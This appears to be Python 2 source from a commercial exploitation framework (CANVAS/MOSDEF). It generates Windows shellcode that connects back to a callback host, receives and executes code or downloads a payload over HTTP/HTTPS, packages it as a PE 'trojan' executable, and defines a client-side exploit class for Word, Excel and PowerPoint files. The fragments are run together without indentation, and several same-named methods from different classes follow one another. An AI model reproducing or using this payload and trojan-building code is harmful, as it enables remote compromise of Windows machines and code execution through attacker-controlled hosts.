def getWinShellcode(self):
trojan = ''
try:
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32',
{"win8_compatible": True})
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
mosdef_type = self.engine.getMosdefType(
canvasengine.WIN32MOSDEF_INTEL)
mosdef_id = self.engine.getNewMosdefID(self)
sc.addAttr("send_universal", {
"mosdef_type": mosdef_type,
"mosdef_id": mosdef_id
})
sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'})
sc.addAttr("ExitThread", None)
sc.vAllocSelf = True #we need to move to another page!
myPElib = pelib.PElib()
trojan = myPElib.createPEFileBuf(sc.get())
except:
import traceback
traceback.print_exc(file=sys.stderr)
self.shellcode = trojan
return self.shellcode
def makedownloadfile(self):
"""Makes the trojan code file"""
import pelib
p = pelib.PElib()
imports = [ ("advapi32.dll", ["RevertToSelf", "AccessCheck"]), ("urlmon.dll", ["URLDownloadToFileA", "FindMediaType" ]) ]
filedata = p.createPEFileBuf(self.shellcode, imports)
#filedata=file("extras/testvuln1.exe","rb").read()
#filedata+="\r\n\r\n"
return filedata
def createShellcode(self):
sc=shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip})
sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread",None)
rawshellcode=sc.get()
print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
pe = pelib.PElib()
self.shellcode = pe.createPEFileBuf(rawshellcode)
return self.shellcode
class theexploit(httpclientside):
def __init__(self):
httpclientside.__init__(self)
self.setVersions()
self.version = 1
self.clientversion = None
self.name = NAME
self.filename = None
self.exefile = None
def displayVersions(self):
for v in self.versions.keys():
print "Version %d: %s" % (v, self.versions[v][0])
def setVersions(self):
self.versions = {}
#name
self.versions[1] = ("MS Word file", None)
self.versions[2] = ("MS Excel file", None)
self.versions[3] = ("MS Powerpoint file", None)
def neededListenerTypes(self):
from canvasengine import WIN32MOSDEF
return [WIN32MOSDEF]
def createShellcode(self):
from shellcode import shellcodeGenerator
httpWrapper = ""
try:
if self.HTTPMOSDEF == True:
self.log("[!] using HTTP MOSDEF tunneling payload ..")
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000})
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
# this is what you need your exploits to port them to HTTPS MOSDEF compatibility
if self.useSSLMOSDEF == True:
ssl = "s"
else:
ssl = ""
# end of change
sc.addAttr(
"httpGetShellcode", {
"URL":
"http%s://%s:%d" %
(ssl, self.callback.ip, self.callback.port)
})
httpWrapper = sc.get()
self.log("[!] HTTP MOSDEF len: %d bytes" % len(httpWrapper))
except Exception, msg:
#print "Exception in HTTP MOSDEF Payload generation: %s" % msg
httpWrapper = ""
self.shellcode = self.createInjectToSelf(self.callback.ip,
self.callback.port,
injectme=httpWrapper)
self.log("Callback Host/Port: %s/%s" %
(self.callback.ip, self.callback.port))
pe = pelib.PElib()
self.shellcode = pe.createPEFileBuf(self.shellcode)
return self.shellcode